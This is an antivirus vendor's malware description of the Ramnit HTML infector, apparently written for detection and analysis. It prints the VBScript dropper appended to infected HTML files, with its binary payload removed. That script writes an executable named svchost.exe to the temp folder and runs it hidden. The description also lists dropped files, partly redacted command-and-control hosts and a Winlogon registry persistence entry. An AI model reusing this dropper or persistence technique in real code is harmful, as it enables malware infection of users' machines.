Virus Characteristics
----------Updated on April 01,2013 ------------
Aliases
- Microsoft - Virus:VBS/Ramnit.gen!A
- Avira - HTML/Rce.Gen3
- Drweb - VBS.Rmnet.2
“W32/Ramnit.a!htm” is a detection for the HTML which is infected by a virus. The source virus is detected as W32/Virut.gen.a.
“W32/Virut.gen.a” is a virus that infects exe, dll, html and scr files by injecting it own viral code. It may also spread via removable drives and mapped drives.
“W32/Ramnit.a!htm” is a infected .HTM and .HTML which will causes a execution of another instance of W32/Virut.gen.a virus.
The infected HTML files have an appended VBScript. When the user opens the infected HTML file, the VBScript drops a copy of W32/Ramnit file into the below mentioned location.
Below is theVB script added into source of all the html files in the compromised machine.
- <SCRIPT Language=VBScript><!--
- DropFileName = "svchost.exe"
- WriteData =[Binary Data]
- Set FSO = CreateObject("Scripting.FileSystemObject")
- DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
- If FSO.FileExists(DropPath)=False Then
- Set FileObj = FSO.CreateTextFile(DropPath, True)
- For i = 1 To Len(WriteData) Step 2
- FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
- Next
- FileObj.Close
- End If
- Set WSHshell = CreateObject("WScript.Shell")
- WSHshell.Run DropPath, 0
- //--></SCRIPT> <!—[Content removed]-->
The above is the malicious VB script write by the virus, which drops a file svchost.exe and writes the binary data into it and executes the virus.
---------------------------------------------------------------------------
---------Updated on May 17th, 2012---------------------
Aliases
- Kaspersky - Trojan-Dropper.VBS.Agent.bp
- NOD32 - Win32/Ramnit.A
- Ikarus - Virus.VBS.Ramnit
- Microsoft - Virus:VBS/Ramnit.B
W32/Ramnit.a!htm is detection for this Trojan which contains a malicious VB script. When the infected HTML file opened and drops a malicious file in the user system.
Once the infected HTML file opened, it drops a file into the following location and executes it:
Once the svchost.exe executed it tries to connect to the following URLs through a remote port 443:
- 91.220.[Removed].30
- rterybrst[Removed]erve.com
And it drops the following files:
- %Windir%\system32\dllcache\vgx.dll
- %Windir%\system32\dmlconf.dat
- %userprofile%\Desktop\svchostmgr.exe
- %Programfiles%\Common Files\Microsoft Shared\VGX\vgx.dll
- %Programfiles%\Common Files\System\msadc\OLD128.tmp
- %Programfiles%\Windows Media Player\OLD12B.tmp
- %Programfiles%\Microsoft\WaterMark.exe
The following registry key has been added.
- [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\]
“Userinit” = "%Windir%\system32\userinit.exe,, %Programfiles% \microsoft\watermark.exe"
The above mentioned registry ensures that, the Trojan registers with the compromised system and execute itself upon every boot.
------------------------------------------------------------------------------------------------------
"W32/Ramnit" is a virus that infects the HTML document files with ".HTML" or ".HTM" extension.
"W32/Ramnit.a!htm" is a generic detection for .html files which are infected with W32/Ramnit virus and the infected HTML files are McAfee detected as W32/Ramnit.a!htm.
The infected HTML files have an appended VBScript. When the user opens the infected HTML file, the VBScript drops a copy of W32/Ramnit file into the below mentioned location.
The dropped file "svchost.exe" is then executed.